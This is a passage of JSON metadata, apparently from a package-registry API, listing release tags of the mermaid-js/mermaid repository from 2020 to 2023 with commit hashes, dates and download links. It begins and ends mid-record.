02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:3